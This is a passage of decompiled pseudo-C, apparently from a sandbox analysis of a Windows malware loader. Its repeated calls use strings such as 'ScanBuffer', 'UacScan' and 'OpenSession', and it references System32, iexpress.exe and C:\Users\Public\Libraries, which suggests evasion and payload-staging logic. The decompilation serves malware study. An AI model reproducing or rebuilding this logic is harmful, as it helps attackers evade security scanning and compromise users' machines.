				char _v3440;
				char _v3444;
				intOrPtr _v3448;
				char _v3452;
				char _v3456;
				char _v3460;
				char _v3464;
				intOrPtr _v3468;
				char _v3472;
				char _v3476;
				char _v3480;
				char _v3484;
				intOrPtr _v3488;
				char _v3492;
				char _v3496;
				char _v3500;
				intOrPtr _v3504;
				char _v3508;
				char _v3512;
				char _v3516;
				intOrPtr _v3520;
				char _v3524;
				char _v3528;
				char _v3532;
				intOrPtr _v3536;
				char _v3540;
				char _v3544;
				char _v3548;
				intOrPtr _v3552;
				char _v3556;
				char _v3560;
				char _v3564;
				intOrPtr _v3568;
				char _v3572;
				char _v3576;
				char _v3580;
				intOrPtr _v3584;
				char _v3588;
				char _v3592;
				char _v3596;
				intOrPtr _v3600;
				char _v3604;
				char _v3608;
				char _v3612;
				intOrPtr _v3616;
				char _v3620;
				char _v3624;
				char _v3628;
				intOrPtr _v3632;
				char _v3636;
				char _v3640;
				char _v3676;
				intOrPtr _v3680;
				char _v3684;
				char _v3688;
				char _v3692;
				intOrPtr _v3696;
				char _v3700;
				char _v3704;
				char _v3708;
				intOrPtr _v3712;
				char _v3716;
				char _v3720;
				char _v3724;
				intOrPtr _v3728;
				char _v3732;
				char _v3736;
				char _v3740;
				intOrPtr _v3744;
				char _v3748;
				char _v3752;
				char _v3756;
				intOrPtr _v3760;
				char _v3764;
				char _v3768;
				intOrPtr _v3772;
				char _v3776;
				char _v3780;
				intOrPtr _v3784;
				char _v3788;
				char _v3792;
				char _v3796;
				intOrPtr _v3800;
				char _v3804;
				char _v3808;
				char _v3812;
				intOrPtr _v3816;
				char _v3820;
				char _v3824;
				char _v3828;
				intOrPtr _v3832;
				char _v3836;
				char _v3840;
				char _v3844;
				char _v3848;
				intOrPtr _v3852;
				char _v3856;
				char _v3860;
				char _v3864;
				intOrPtr _v3868;
				char _v3872;
				char _v3876;
				char _v3880;
				char _v3884;
				char _v3888;
				char _v3892;
				intOrPtr _v3896;
				char _v3900;
				char _v3904;
				char _v3908;
				intOrPtr _v3912;
				char _v3916;
				char _v3920;
				char _v3924;
				intOrPtr _v3928;
				char _v3932;
				char _v3936;
				char _v3940;
				char _v3944;
				intOrPtr _v3948;
				char _v3952;
				char _v3956;
				char _v3960;
				intOrPtr _v3964;
				char _v3968;
				char _v3972;
				char _v3976;
				char _v3980;
				char _v3984;
				intOrPtr _v3988;
				char _v3992;
				char _v3996;
				char _v4000;
				intOrPtr _v4004;
				char _v4008;
				char _v4012;
				char _v4016;
				intOrPtr _v4020;
				char _v4024;
				char _v4028;
				char _v4032;
				char _v4036;
				char _v4040;
				char _v4044;
				char _v4048;
				char _v4052;
				char _v4056;
				char _v4060;
				char _v4064;
				char _v4068;
				char _v4072;
				char _v4076;
				char _v4080;
				char _v4084;
				char _v4088;
				char _v4092;
				char _v4096;
				char _v4100;
				char _v4104;
				intOrPtr _v4108;
				char _v4112;
				char _v4116;
				char _v4120;
				intOrPtr _v4124;
				char _v4128;
				char _v4132;
				char _v4136;
				intOrPtr _v4140;
				char _v4144;
				char _v4148;
				char _v4152;
				char _v4156;
				char _v4160;
				char _v4164;
				char _v4168;
				char _v4172;
				char _v4176;
				char _v4180;
				char _v4184;
				char _v4188;
				char _v4192;
				char _v4196;
				char _v4200;
				char _v4204;
				char _v4208;
				char _v4212;
				char _v4216;
				char _v4220;
				char _v4224;
				char _v4228;
				char _v4232;
				char _v4236;
				char _v4240;
				char _v4244;
				char _v4248;
				char _v4252;
				char _v4256;
				char _v4260;
				char _v4264;
				char _v4268;
				char _v4272;
				char _v4276;
				char _v4280;
				char _v4284;
				char _v4288;
				char _v4292;
				char _v4296;
				char _v4300;
				char _v4304;
				char _v4308;
				char _v4312;
				char _v4316;
				char _v4320;
				char _v4324;
				char _v4328;
				intOrPtr _v4332;
				char _v4336;
				char _v4340;
				char _v4344;
				intOrPtr _v4348;
				char _v4352;
				char _v4356;
				char _v4360;
				intOrPtr _v4364;
				char _v4368;
				char _v4372;
				intOrPtr _t1978;
				void* _t1983;
				intOrPtr _t2062;
				intOrPtr _t2140;
				void* _t2141;
				intOrPtr _t2170;
				intOrPtr _t2171;
				intOrPtr _t2345;
				void* _t2346;
				intOrPtr _t2347;
				intOrPtr _t2407;
				intOrPtr _t2469;
				intOrPtr _t2581;
				intOrPtr _t2615;
				intOrPtr _t2616;
				intOrPtr _t2674;
				intOrPtr _t2704;
				intOrPtr _t2750;
				void* _t2751;
				intOrPtr _t2752;
				intOrPtr _t2798;
				intOrPtr _t2846;
				intOrPtr _t2890;
				intOrPtr _t2934;
				intOrPtr _t3348;
				intOrPtr _t3392;
				intOrPtr _t3427;
				intOrPtr* _t3428;
				intOrPtr _t3473;
				intOrPtr _t3548;
				intOrPtr _t3625;
				intOrPtr _t3703;
				intOrPtr _t3705;
				intOrPtr* _t3735;
				void* _t3736;
				intOrPtr _t3737;
				intOrPtr _t3781;
				intOrPtr _t3782;
				intOrPtr _t3785;
				intOrPtr* _t3793;
				intOrPtr* _t3811;
				intOrPtr* _t3861;
				intOrPtr* _t3882;
				intOrPtr _t3885;
				intOrPtr* _t4210;
				intOrPtr* _t4213;
				intOrPtr* _t4221;
				intOrPtr* _t4257;
				intOrPtr* _t4292;
				intOrPtr _t4295;
				intOrPtr _t4325;
				intOrPtr _t4360;
				void* _t4361;
				intOrPtr _t4362;
				intOrPtr _t4450;
				intOrPtr* _t4451;
				intOrPtr* _t4630;
				intOrPtr* _t4631;
				intOrPtr _t4688;
				intOrPtr* _t4692;
				intOrPtr _t4805;
				intOrPtr _t4897;
				void* _t4899;
				intOrPtr _t4900;
				intOrPtr _t4901;
				intOrPtr _t4902;
				intOrPtr _t4903;
				intOrPtr _t4904;
				intOrPtr _t4905;
				intOrPtr _t4906;
				intOrPtr _t4907;
				intOrPtr _t4908;
				intOrPtr _t4909;
				intOrPtr _t4910;
				intOrPtr _t4911;
				intOrPtr _t4912;
				intOrPtr _t4913;
				intOrPtr _t4914;
				intOrPtr _t4915;
				intOrPtr _t4916;
				intOrPtr _t4917;
				intOrPtr _t4918;
				intOrPtr _t4919;
				intOrPtr _t4920;
				intOrPtr _t4921;
				intOrPtr _t4923;
				intOrPtr _t4924;
				intOrPtr _t4925;
				intOrPtr _t4926;
				intOrPtr _t4927;
				intOrPtr _t4928;
				intOrPtr _t4929;
				intOrPtr _t4930;
				intOrPtr _t4933;
				intOrPtr _t4934;
				intOrPtr _t4935;
				intOrPtr _t4936;
				intOrPtr _t4938;
				intOrPtr _t4939;
				intOrPtr _t4940;
				intOrPtr _t4941;
				intOrPtr _t4942;
				intOrPtr _t4943;
				intOrPtr _t4944;
				intOrPtr _t4945;
				intOrPtr _t4947;
				intOrPtr _t4948;
				intOrPtr _t4949;
				intOrPtr _t4950;
				intOrPtr _t4951;
				intOrPtr _t4952;
				intOrPtr _t4953;
				intOrPtr _t4954;
				intOrPtr _t4955;
				intOrPtr _t4958;
				intOrPtr _t4959;
				intOrPtr _t4960;
				intOrPtr _t4961;
				intOrPtr _t4962;
				intOrPtr _t4963;
				intOrPtr _t4965;
				intOrPtr _t4966;
				intOrPtr _t4967;
				intOrPtr _t4969;
				intOrPtr _t4970;
				intOrPtr _t4971;
				intOrPtr _t4972;
				intOrPtr _t4973;
				intOrPtr _t4974;
				intOrPtr _t4975;
				intOrPtr _t4976;
				intOrPtr _t4977;
				intOrPtr _t4978;
				intOrPtr _t4979;
				intOrPtr _t4980;
				intOrPtr _t4981;
				intOrPtr _t4982;
				intOrPtr _t4983;
				intOrPtr _t4984;
				intOrPtr _t4985;
				intOrPtr _t4986;
				intOrPtr _t4987;
				intOrPtr _t4988;
				intOrPtr _t4989;
				intOrPtr _t4990;
				intOrPtr _t4991;
				intOrPtr _t4993;
				intOrPtr _t4994;
				intOrPtr _t4995;
				intOrPtr _t4996;
				intOrPtr _t4997;
				intOrPtr _t4998;
				intOrPtr _t4999;
				intOrPtr _t5000;
				intOrPtr _t5001;
				intOrPtr _t5002;
				intOrPtr _t5004;
				intOrPtr _t5005;
				intOrPtr _t5006;
				intOrPtr _t5007;
				intOrPtr _t5008;
				intOrPtr _t5009;
				intOrPtr _t5010;
				intOrPtr _t5011;
				intOrPtr _t5012;
				intOrPtr _t5013;
				intOrPtr _t5014;
				intOrPtr _t5015;
				intOrPtr _t5016;
				intOrPtr* _t5017;
				intOrPtr _t5018;
				intOrPtr _t5019;
				intOrPtr _t5023;
				intOrPtr _t5024;
				intOrPtr _t5025;
				intOrPtr* _t5028;
				intOrPtr _t5029;
				intOrPtr _t5030;
				intOrPtr _t5031;
				intOrPtr _t5032;
				intOrPtr _t5034;
				intOrPtr _t5038;
				intOrPtr _t5039;
				intOrPtr _t5040;
				intOrPtr _t5041;
				intOrPtr _t5042;
				intOrPtr _t5043;
				intOrPtr _t5044;
				intOrPtr _t5045;
				intOrPtr _t5046;
				intOrPtr _t5047;
				intOrPtr _t5048;
				intOrPtr _t5049;
				intOrPtr _t5050;
				intOrPtr _t5051;
				intOrPtr _t5052;
				intOrPtr _t5053;
				intOrPtr _t5054;
				intOrPtr _t5055;
				intOrPtr _t5056;
				intOrPtr _t5057;
				intOrPtr _t5058;
				intOrPtr _t5063;
				intOrPtr _t5064;
				intOrPtr _t5067;
				intOrPtr _t5068;
				intOrPtr _t5072;
				intOrPtr _t5073;
				intOrPtr _t5074;
				intOrPtr _t5075;
				intOrPtr _t5077;
				intOrPtr _t5078;
				intOrPtr _t5079;
				intOrPtr _t5080;
				intOrPtr _t5081;
				intOrPtr _t5082;
				intOrPtr _t5083;
				intOrPtr _t5084;
				intOrPtr _t5085;
				intOrPtr _t5086;
				intOrPtr _t5087;
				intOrPtr _t5088;
				intOrPtr _t5089;
				intOrPtr _t5090;
				intOrPtr _t5091;
				intOrPtr _t5092;
				intOrPtr _t5093;
				intOrPtr _t5094;
				intOrPtr _t5095;
				intOrPtr _t5096;
				intOrPtr _t5097;
				intOrPtr _t5098;
				intOrPtr _t5099;
				intOrPtr _t5100;
				intOrPtr _t5101;
				intOrPtr _t5102;
				intOrPtr _t5103;
				intOrPtr _t5104;
				intOrPtr _t5105;
				intOrPtr _t5106;
				intOrPtr _t5107;
				intOrPtr _t5108;
				intOrPtr _t5109;
				intOrPtr _t5110;
				intOrPtr _t5111;
				intOrPtr _t5112;
				void* _t5118;
				void* _t5123;
				void* _t5128;
				void* _t5133;
				void* _t5138;
				void* _t5143;
				void* _t5148;
				void* _t5155;
				void* _t5161;
				void* _t5169;
				void* _t5174;
				void* _t5179;
				void* _t5184;
				void* _t5190;
				void* _t5195;
				void* _t5200;
				void* _t5206;
				void* _t5212;
				void* _t5217;
				intOrPtr _t5218;
				void* _t5225;
				void* _t5230;
				void* _t5237;
				void* _t5242;
				void* _t5247;
				void* _t5256;
				void* _t5261;
				void* _t5266;
				void* _t5271;
				intOrPtr _t5272;
				intOrPtr _t5294;
				intOrPtr _t5300;
				void* _t5310;
				void* _t5315;
				void* _t5320;
				void* _t5325;
				void* _t5332;
				void* _t5337;
				void* _t5342;
				void* _t5347;
				void* _t5354;
				void* _t5359;
				void* _t5364;
				void* _t5369;
				intOrPtr _t5370;
				void* _t5377;
				void* _t5382;
				void* _t5387;
				void* _t5392;
				void* _t5421;
				void* _t5426;
				void* _t5432;
				void* _t5437;
				void* _t5443;
				void* _t5448;
				void* _t5453;
				void* _t5458;
				void* _t5464;
				void* _t5469;
				intOrPtr _t5470;
				void* _t5476;
				void* _t5481;
				void* _t5486;
				void* _t5493;
				void* _t5498;
				void* _t5503;
				void* _t5511;
				void* _t5516;
				void* _t5521;
				void* _t5527;
				void* _t5532;
				void* _t5537;
				void* _t5543;
				void* _t5548;
				void* _t5553;
				void* _t5559;
				void* _t5564;
				void* _t5567;
				void* _t5572;
				void* _t5577;
				void* _t5582;
				void* _t5585;
				void* _t5588;
				void* _t5591;
				void* _t5594;
				void* _t5597;
				void* _t5600;
				void* _t5603;
				void* _t5606;
				void* _t5609;
				void* _t5630;
				void* _t5635;
				void* _t5640;
				void* _t5643;
				void* _t5646;
				void* _t5649;
				void* _t5652;
				void* _t5655;
				void* _t5658;
				void* _t5661;
				void* _t5664;
				void* _t5667;
				void* _t5670;
				void* _t5673;
				void* _t5676;
				void* _t5679;
				void* _t5682;
				void* _t5685;
				void* _t5688;
				void* _t5691;
				void* _t5694;
				void* _t5697;
				void* _t5700;
				void* _t5703;
				void* _t5706;
				void* _t5711;
				void* _t5716;
				void* _t5721;
				void* _t5728;
				void* _t5733;
				void* _t5738;
				void* _t5746;
				void* _t5751;
				void* _t5756;
				void* _t5761;
				void* _t5766;
				void* _t5768;
				void* _t5773;
				void* _t5778;
				void* _t5785;
				void* _t5790;
				intOrPtr _t5791;
				intOrPtr _t5792;
				void* _t5794;
				void* _t5800;
				void* _t5805;
				void* _t5810;
				void* _t5815;
				void* _t5821;
				void* _t5828;
				void* _t5833;
				void* _t5838;
				void* _t5845;
				void* _t5850;
				void* _t5855;
				void* _t5860;
				intOrPtr _t5862;
				void* _t5867;
				void* _t5872;
				void* _t5877;
				intOrPtr _t5878;
				void* _t5885;
				void* _t5891;
				void* _t5896;
				void* _t5901;
				void* _t5909;
				intOrPtr _t5913;
				void* _t5920;
				void* _t5925;
				void* _t5930;
				void* _t5937;
				void* _t5942;
				void* _t5947;
				void* _t5952;
				void* _t5957;
				void* _t5964;
				void* _t5969;
				void* _t5974;
				void* _t5979;
				void* _t5984;
				intOrPtr _t5985;
				intOrPtr _t5986;
				void* _t5988;
				void* _t5993;
				void* _t5998;
				void* _t6003;
				void* _t6008;
				void* _t6013;
				void* _t6018;
				void* _t6024;
				void* _t6029;
				void* _t6040;
				void* _t6045;
				void* _t6053;
				void* _t6058;
				intOrPtr _t6062;
				void* _t6067;
				void* _t6072;
				void* _t6078;
				void* _t6083;
				void* _t6090;
				void* _t6095;
				void* _t6100;
				void* _t6105;
				void* _t6110;
				void* _t6115;
				void* _t6121;
				void* _t6126;
				void* _t6131;
				void* _t6136;
				void* _t6143;
				void* _t6148;
				void* _t6153;
				void* _t6158;
				void* _t6163;
				void* _t6168;
				void* _t6174;
				void* _t6179;
				void* _t6184;
				void* _t6189;
				void* _t6194;
				void* _t6199;
				void* _t6206;
				void* _t6211;
				void* _t6216;
				void* _t6221;
				void* _t6226;
				void* _t6231;
				void* _t6236;
				void* _t6241;
				void* _t6246;
				void* _t6251;
				void* _t6256;
				void* _t6261;
				void* _t6266;
				void* _t6271;
				intOrPtr _t6272;
				void* _t6274;
				void* _t6275;
				intOrPtr _t6277;
				intOrPtr _t6278;
				void* _t6295;

				_t6295 = __fp0;
				_t6275 = __esi;
				_t6274 = __edi;
				_t6277 = _t6278;
				_t4899 = 0x222;
				do {
					_push(0);
					_push(0);
					_t4899 = _t4899 - 1;
				} while (_t4899 != 0);
				_push(__ebx);
				_push(_t6277);
				_push(0x2874c19);
				_push( *[fs:eax]);
				 *[fs:eax] = _t6278;
				_push(0x8ae); // executed
				L02867B1C(); // executed
				if(0 == 0) {
					E028544F4(0x28a65fc, 0x2874c40);
				} else {
					E028544F4(0x28a65fc, 0x2874c30);
				}
				_push(0x2874c4c);
				_push( *0x28a65fc);
				_push("OpenSession");
				E02854824();
				E02854698( &_v8, E02854964(_v12));
				_push(_v8);
				_t4900 =  *0x28a65fc; // 0x29f1b38
				E028547B0( &_v20, _t4900, 0x2874c4c);
				E02854698( &_v16, E02854964(_v20));
				_pop(_t5118); // executed
				E02867B80(_v16, _t5118); // executed
				_push(0x2874c4c);
				_push( *0x28a65fc);
				_push("ScanString");
				E02854824();
				E02854698( &_v24, E02854964(_v28));
				_push(_v24);
				_t4901 =  *0x28a65fc; // 0x29f1b38
				E028547B0( &_v36, _t4901, 0x2874c4c);
				E02854698( &_v32, E02854964(_v36));
				_pop(_t5123); // executed
				E02867B80(_v32, _t5123); // executed
				_push(0x2874c4c);
				_push( *0x28a65fc);
				_push("Initialize");
				E02854824();
				E02854698( &_v40, E02854964(_v44));
				_push(_v40);
				_t4902 =  *0x28a65fc; // 0x29f1b38
				E028547B0( &_v52, _t4902, 0x2874c4c);
				E02854698( &_v48, E02854964(_v52));
				_pop(_t5128); // executed
				E02867B80(_v48, _t5128); // executed
				_push(0x2874c4c);
				_push( *0x28a65fc);
				_push("ScanBuffer");
				E02854824();
				E02854698( &_v56, E02854964(_v60));
				_push(_v56);
				_t4903 =  *0x28a65fc; // 0x29f1b38
				E028547B0( &_v68, _t4903, 0x2874c4c);
				E02854698( &_v64, E02854964(_v68));
				_pop(_t5133); // executed
				E02867B80(_v64, _t5133); // executed
				E02852EE0();
				_push(0x2874c4c);
				_push( *0x28a65fc);
				_push("UacScan");
				E02854824();
				E02854698( &_v72, E02854964(_v76));
				_push(_v72);
				_t4904 =  *0x28a65fc; // 0x29f1b38
				E028547B0( &_v84, _t4904, 0x2874c4c);
				E02854698( &_v80, E02854964(_v84));
				_pop(_t5138); // executed
				E02867B80(_v80, _t5138); // executed
				_push(0x2874c4c);
				_push( *0x28a65fc);
				_push("UacInitialize");
				E02854824();
				E02854698( &_v88, E02854964(_v92));
				_push(_v88);
				_t4905 =  *0x28a65fc; // 0x29f1b38
				E028547B0( &_v100, _t4905, 0x2874c4c);
				E02854698( &_v96, E02854964(_v100));
				_pop(_t5143); // executed
				E02867B80(_v96, _t5143); // executed
				_push(0x2874c4c);
				_push( *0x28a65fc);
				_push("ScanBuffer");
				E02854824();
				E02854698( &_v104, E02854964(_v108));
				_push(_v104);
				_t4906 =  *0x28a65fc; // 0x29f1b38
				E028547B0( &_v116, _t4906, 0x2874c4c);
				E02854698( &_v112, E02854964(_v116));
				_pop(_t5148); // executed
				E02867B80(_v112, _t5148); // executed
				E02854698(0x28a659c, E02854964( *((intOrPtr*)(0x2877ad4 + E02867CB0(1, 3) * 4))));
				_push(0x2874c4c);
				_push( *0x28a65fc);
				_push("ScanString");
				E02854824();
				E02854698( &_v120, E02854964(_v124));
				_push(_v120);
				_t4907 =  *0x28a65fc; // 0x29f1b38
				E028547B0( &_v132, _t4907, 0x2874c4c);
				E02854698( &_v128, E02854964(_v132));
				_pop(_t5155); // executed
				E02867B80(_v128, _t5155); // executed
				_t4908 =  *0x28a659c; // 0x28c40a8
				E028547B0( &_v136, _t4908, "C:\\Windows\\System32\\");
				if(E02857E40(_v136) == 0) {
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("ScanString");
					E02854824();
					E02854698( &_v156, E02854964(_v160));
					_push(_v156);
					_t4909 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v168, _t4909, 0x2874c4c);
					E02854698( &_v164, E02854964(_v168));
					_pop(_t5161);
					E02867B80(_v164, _t5161);
					E028544F4(0x28a6578, "iexpress.exe");
				} else {
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("ScanString");
					E02854824();
					E02854698( &_v140, E02854964(_v144));
					_push(_v140);
					_t5112 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v152, _t5112, 0x2874c4c);
					E02854698( &_v148, E02854964(_v152));
					_pop(_t6271); // executed
					E02867B80(_v148, _t6271); // executed
					_t6272 =  *0x28a659c; // 0x28c40a8
					E028544F4(0x28a6578, _t6272);
				}
				E0285C348(0,  &_v172);
				E028544F4(0x28a6558, _v172);
				_push(0x2874c4c);
				_push( *0x28a65fc);
				_push("UacScan");
				E02854824();
				E02854698( &_v176, E02854964(_v180));
				_push(_v176);
				_t4910 =  *0x28a65fc; // 0x29f1b38
				E028547B0( &_v188, _t4910, 0x2874c4c);
				E02854698( &_v184, E02854964(_v188));
				_pop(_t5169); // executed
				E02867B80(_v184, _t5169); // executed
				_push(0x2874c4c);
				_push( *0x28a65fc);
				_push("Initialize");
				E02854824();
				E02854698( &_v192, E02854964(_v196));
				_push(_v192);
				_t4911 =  *0x28a65fc; // 0x29f1b38
				E028547B0( &_v204, _t4911, 0x2874c4c);
				E02854698( &_v200, E02854964(_v204));
				_pop(_t5174); // executed
				E02867B80(_v200, _t5174); // executed
				_push(0x2874c4c);
				_push( *0x28a65fc);
				_push("UacInitialize");
				E02854824();
				E02854698( &_v208, E02854964(_v212));
				_push(_v208);
				_t4912 =  *0x28a65fc; // 0x29f1b38
				E028547B0( &_v220, _t4912, 0x2874c4c);
				E02854698( &_v216, E02854964(_v220));
				_pop(_t5179); // executed
				E02867B80(_v216, _t5179); // executed
				_push(0x2874c4c);
				_push( *0x28a65fc);
				_push("ScanString");
				E02854824();
				E02854698( &_v224, E02854964(_v228));
				_push(_v224);
				_t4913 =  *0x28a65fc; // 0x29f1b38
				E028547B0( &_v236, _t4913, 0x2874c4c);
				E02854698( &_v232, E02854964(_v236));
				_pop(_t5184); // executed
				E02867B80(_v232, _t5184); // executed
				E028544F4(0x28a65d0, "C:\\Users\\Public\\Libraries");
				_push(0x2874c4c);
				_push( *0x28a65fc);
				_push("Initialize");
				E02854824();
				E02854698( &_v240, E02854964(_v244));
				_push(_v240);
				_t4914 =  *0x28a65fc; // 0x29f1b38
				E028547B0( &_v252, _t4914, 0x2874c4c);
				E02854698( &_v248, E02854964(_v252));
				_pop(_t5190); // executed
				E02867B80(_v248, _t5190); // executed
				_push(0x2874c4c);
				_push( *0x28a65fc);
				_push("ScanBuffer");
				E02854824();
				E02854698( &_v256, E02854964(_v260));
				_push(_v256);
				_t4915 =  *0x28a65fc; // 0x29f1b38
				E028547B0( &_v268, _t4915, 0x2874c4c);
				E02854698( &_v264, E02854964(_v268));
				_pop(_t5195); // executed
				E02867B80(_v264, _t5195); // executed
				_push(0x2874c4c);
				_push( *0x28a65fc);
				_push("OpenSession");
				E02854824();
				E02854698( &_v272, E02854964(_v276));
				_push(_v272);
				_t4916 =  *0x28a65fc; // 0x29f1b38
				E028547B0( &_v284, _t4916, 0x2874c4c);
				E02854698( &_v280, E02854964(_v284));
				_pop(_t5200); // executed
				E02867B80(_v280, _t5200);
				_t1978 =  *0x28a6548; // 0x0
				E02854698( &_v288, E02854964(_t1978));
				_t1983 = E02857E40(_v288);
				_t6284 = _t1983;
				if(_t1983 == 0) {
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("UacScan");
					E02854824();
					E02854698( &_v500, E02854964(_v504));
					_push(_v500);
					_t4917 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v512, _t4917, 0x2874c4c);
					E02854698( &_v508, E02854964(_v512));
					_pop(_t5206); // executed
					E02867B80(_v508, _t5206); // executed
					E028544F4(0x28a65ec, 0x2874d2c);
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("OpenSession");
					E02854824();
					E02854698( &_v516, E02854964(_v520));
					_push(_v516);
					_t4918 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v528, _t4918, 0x2874c4c);
					E02854698( &_v524, E02854964(_v528));
					_pop(_t5212); // executed
					E02867B80(_v524, _t5212); // executed
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("ScanBuffer");
					E02854824();
					E02854698( &_v532, E02854964(_v536));
					_push(_v532);
					_t4919 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v544, _t4919, 0x2874c4c);
					E02854698( &_v540, E02854964(_v544));
					_pop(_t5217); // executed
					E02867B80(_v540, _t5217); // executed
					_t5218 =  *0x28a6558; // 0x7f200018
					E02854DA4( &_v552, _t5218);
					E0286BDD8(_v552, 0x28a65d4,  &_v548, _t6275); // executed
					E028544F4(0x28a65cc, _v548);
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("OpenSession");
					E02854824();
					E02854698( &_v556, E02854964(_v560));
					_push(_v556);
					_t4920 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v568, _t4920, 0x2874c4c);
					E02854698( &_v564, E02854964(_v568));
					_pop(_t5225); // executed
					E02867B80(_v564, _t5225); // executed
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("ScanString");
					E02854824();
					E02854698( &_v572, E02854964(_v576));
					_push(_v572);
					_t4921 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v584, _t4921, 0x2874c4c);
					E02854698( &_v580, E02854964(_v584));
					_pop(_t5230); // executed
					E02867B80(_v580, _t5230); // executed
					_t2062 =  *0x28a65cc; // 0x7faf0018, executed
					E0286BF30(_t2062, 0x28a65d4,  &_v588, 0x2874d38, _t6274, _t6275); // executed
					_t4923 =  *0x286bc00; // 0x286bc04
					E028557DC(0x28a65d4, _t4923, _v588);
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("ScanBuffer");
					E02854824();
					E02854698( &_v592, E02854964(_v596));
					_push(_v592);
					_t4924 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v604, _t4924, 0x2874c4c);
					E02854698( &_v600, E02854964(_v604));
					_pop(_t5237); // executed
					E02867B80(_v600, _t5237); // executed
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("Initialize");
					E02854824();
					E02854698( &_v608, E02854964(_v612));
					_push(_v608);
					_t4925 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v620, _t4925, 0x2874c4c);
					E02854698( &_v616, E02854964(_v620));
					_pop(_t5242); // executed
					E02867B80(_v616, _t5242); // executed
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("ScanString");
					E02854824();
					E02854698( &_v624, E02854964(_v628));
					_push(_v624);
					_t4926 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v636, _t4926, 0x2874c4c);
					E02854698( &_v632, E02854964(_v636));
					_pop(_t5247); // executed
					E02867B80(_v632, _t5247); // executed
					E028544F4(0x28a656c,  *((intOrPtr*)( *0x28a65d4 + 4)));
					E028544F4(0x28a6590,  *((intOrPtr*)( *0x28a65d4 + 8)));
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("OpenSession");
					E02854824();
					E02854698( &_v640, E02854964(_v644));
					_push(_v640);
					_t4927 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v652, _t4927, 0x2874c4c);
					E02854698( &_v648, E02854964(_v652));
					_pop(_t5256); // executed
					E02867B80(_v648, _t5256); // executed
					_push(0x2874c4c);
					_push( *0x28a65fc);
					_push("ScanBuffer");
					E02854824();
					E02854698( &_v656, E02854964(_v660));
					_push(_v656);
					_t4928 =  *0x28a65fc; // 0x29f1b38
					E028547B0( &_v668, _t4928, 0x2874c4c);
					E02854698( &_v664, E02854964(_v668));
					_pop(_t5261); // executed
					E02867B80(_v664, _t5261);
					_t2140 =  *0x28a6590; // 0x29f1b78
					_t2141 = E0286BEB8(_t2140, 0x28a65d4, _t5261, _t6274, _t6275, __eflags, _t6295);
					__eflags = _t2141 - 1;
					if(_t2141 == 1) {
						_push(0x2874c4c);
						_push( *0x28a65fc);
						_push("Initialize");
						E02854824();
						E02854698( &_v672, E02854964(_v676));
						_push(_v672);
						_t5074 =  *0x28a65fc; // 0x29f1b38
						E028547B0( &_v684, _t5074, 0x2874c4c);
						E02854698( &_v680, E02854964(_v684));
						_pop(_t6078); // executed
						E02867B80(_v680, _t6078); // executed
						_push(0x2874c4c);
						_push( *0x28a65fc);
						_push("ScanString");
						E02854824();
						E02854698( &_v688, E02854964(_v692));
						_push(_v688);
						_t5075 =  *0x28a65fc; // 0x29f1b38
						E028547B0( &_v700, _t5075, 0x2874c4c);
						E02854698( &_v696, E02854964(_v700));
						_pop(_t6083); // executed
						E02867B80(_v696, _t6083);
						_t4360 =  *0x28a6590; // 0x29f1b78
						_t4361 = E02857AB0(_t4360, __eflags);
						_t4362 =  *0x28a656c; // 0x29bf378
						E0286C5D0(_t4362, 0x28a65d4,  &_v704, _t4361, _t6275);
						E028544F4(0x28a6600, _v704);
						_push(0x2874c4c);
						_push( *0x28a65fc);
						_push("OpenSession");
						E02854824();
						E02854698( &_v708, E02854964(_v712));
						_push(_v708);
						_t5077 =  *0x28a65fc; // 0x29f1b38
						E028547B0( &_v720, _t5077, 0x2874c4c);
						E02854698( &_v716, E02854964(_v720));
						_pop(_t6090); // executed
						E02867B80(_v716, _t6090); // executed
						_push(0x2874c4c);
						_push( *0x28a65fc);
						_push("ScanBuffer");
						E02854824();
						E02854698( &_v724, E02854964(_v728));
						_push(_v724);
						_t5078 =  *0x28a65fc; // 0x29f1b38
						E028547B0( &_v736, _t5078, 0x2874c4c);
						E02854698( &_v732, E02854964(_v736));
						_pop(_t6095); // executed
						E02867B80(_v732, _t6095); // executed
						_push(0x2874c4c);
						_push( *0x28a65fc);
						_push("OpenSession");
						E02854824();
						E02854698( &_v740, E02854964(_v744));
						_push(_v740);
						_t5079 =  *0x28a65fc; // 0x29f1b38
						E028547B0( &_v752, _t5079, 0x2874c4c);
						E02854698( &_v748, E02854964(_v752));
						_pop(_t6100); // executed
						E02867B80(_v748, _t6100); // executed
						_push(0x2874c4c);
						_push( *0x28a65fc);
						_push("UacScan");
						E02854824();
						E02854698( &_v756, E02854964(_v760));
						_push(_v756);
						_t5080 =  *0x28a65fc; // 0x29f1b38
						E028547B0( &_v768, _t5080, 0x2874c4c);
						E02854698( &_v764, E02854964(_v768));
						_pop(_t6105); // executed
						E02867B80(_v764, _t6105); // executed
						_push(0x2874c4c);
						_push( *0x28a65fc);
						_push("Initialize");
						E02854824();
						E02854698( &_v772, E02854964(_v776));
						_push(_v772);
						_t5081 =  *0x28a65fc; // 0x29f1b38
						E028547B0( &_v784, _t5081, 0x2874c4c);
						E02854698( &_v780, E02854964(_v784));
						_pop(_t6110); // executed
						E02867B80(_v780, _t6110); // executed
						_push(0x2874c4c);
						_push( *0x28a65fc);
						_push("ScanBuffer");
						E02854824();
						E02854698( &_v788, E02854964(_v792));
						_push(_v788);
						_t5082 =  *0x28a65fc; // 0x29f1b38
						E028547B0( &_v800, _t5082, 0x2874c4c);
						E02854698( &_v796, E02854964(_v800));
						_pop(_t6115); // executed
